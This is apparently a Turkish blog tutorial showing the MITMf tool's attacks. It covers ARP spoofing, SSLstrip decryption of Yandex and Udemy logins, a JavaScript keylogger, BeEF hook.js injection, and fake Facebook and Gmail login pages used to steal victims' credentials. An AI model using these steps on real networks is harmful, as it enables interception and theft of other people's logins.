0
Mitmf aracı, man in the middle saldırılarını kapsamlı bir şekilde gerçekleştirmenize olanak sağlayn bir framework tür. İçinde bulunan birçok özellik sayesinde kurban ait birçok veriyi çok rahat bir şekilde elde edebilir,değiştirebilir,yönlendirebilirsiniz. Aşağıda var olan özelliklerin birkaçını deneyerek aracı test edelim.

Currently available plugins

  • HTA Drive-By : Injects a fake update notification and prompts clients to download an HTA application
  • SMBTrap : Exploits the ‘SMB Trap’ vulnerability on connected clients
  • ScreenShotter : Uses HTML5 Canvas to render an accurate screenshot of a clients browser
  • Responder : LLMNR, NBT-NS, WPAD and MDNS poisoner
  • SSLstrip+ : Partially bypass HSTS
  • Spoof : Redirect traffic using ARP, ICMP, DHCP or DNS spoofing
  • BeEFAutorun : Autoruns BeEF modules based on a client’s OS or browser type
  • AppCachePoison : Performs HTML5 App-Cache poisoning attacks
  • Ferret-NG : Transperently hijacks client sessions
  • BrowserProfiler : Attempts to enumerate all browser plugins of connected clients
  • FilePwn : Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
  • Inject : Inject arbitrary content into HTML content
  • BrowserSniper : Performs drive-by attacks on clients with out-of-date browser plugins
  • JSkeylogger : Injects a Javascript keylogger into a client’s webpages
  • Replace : Replace arbitrary content in HTML content
  • SMBAuth : Evoke SMB challenge-response authentication attempts
  • Upsidedownternet : Flips images 180 degrees
MITMF aracı ile araya girme saldırısı gerçekleştirme işlemini gösterelim.
Kali de kurulu değilse     apt-get install mitmf   yazarak kurulum yapabilirsiniz.
#mitmf –help  veya -h komutu ile var olan özelliklerini görebilirsiniz.
mitmf
ARPSpoof Saldırısı
Mitmf aracında bulunan arpspoof özelliği ile ARP Spoofing saldırısını test edelim.
mitmf-2
SSLStrip Saldırısı
HTTPS isteklerini çözelim ve giden gelen değerleri görelim. Bunun için –hsts parametresini kullanıyoruz.
mitmf-4
Yandex e ait bir mail login isteğinin çözümlenmesi;
mitmf-5
https://www.udemy.com ait bir login isteğinin çözümlenmesi;
mitmf-6
Resim Döndürme Saldırısı (Upsidedownternet )
Kurbana ait isteklerin resimleri 180 derece döndürülerek kurbana gösterilir.
Kullanılan parametre –upsidedownternet
mitmf-7
Kurbanda görünen resimlere ait görüntü aşağıdaki gibidir.
mitmf-8
Keylogger Özelliği
Kurbanın webte gezinirken yaptığı işlemlere ait klavye hareketlerini görmek için  –jskeylogger  parametresini kullanıyoruz.
mimt-3
Basılan her harfin sırayla alındığını aşağıdan görebiliriz.
mimt-4
mimt-5
Javascript Kodu Enjekte Etme
Web isteklerine javascript kodu ekleyerek saldırı düzeyini artırabiliriz. Bu işlem kullanacağımız ikinci araç BEef aracıdır. Kullanacağımız parametre  –inject  –js-url  ve ilgili javascript kodu barındıran URL(BEef için kullancağımız URl adresini BEef aracını açınca görebiliriz. http://BEef_aracının_calıstığı_makina_IP_adresi:3000/hook.js)
mitmf-11
BEef aracını çalıştıralım. İlgili JS kodu ve BEef panel URL adreslerini aşağıda görebiliriz.
mitmf
Mitmf aracını çalıştırdığımızda ilgili linklere hook.js kodunun URL adresi ile değiştirecek ve tarayıcıda JS kodu çalışmış olacaktır.
mimt-7
BEef panelinede username:beef  password:beef   değerleri ile giriş yaparak kurbanın tarayıcısına ulaşabiliriz. Bundan sonrası BEef aracının özelliklerine veya hayal gücünüze kalmıştır.
mimt-8
BEef ten birkaç özelliği gösterelim. Aşağıda kurban hangi siteye gitmek isterse onu istediğimiz adrese yönlendirebiliriz.

Bir diğer özellik ise taracıda kurbanın karşısına facebook oturum düşürme sosyal mühendisliği ile login bilgilerini alabilirsiniz.
mimt-10
Bir sonraki özellik ise Google Phising ile gmail login sitesine yönlendirebilir ve login bilgilerini çalabilirsiniz.
mimt-11
Aslında kurban istediği sayfada fakat gmail login sayfasıymış gibi ekran geliyor.
mimt-12


Girdiği değerlere BEef panelinden ulaşabiliriz.
mimt-13

Yorum Gönder

 
Yukarı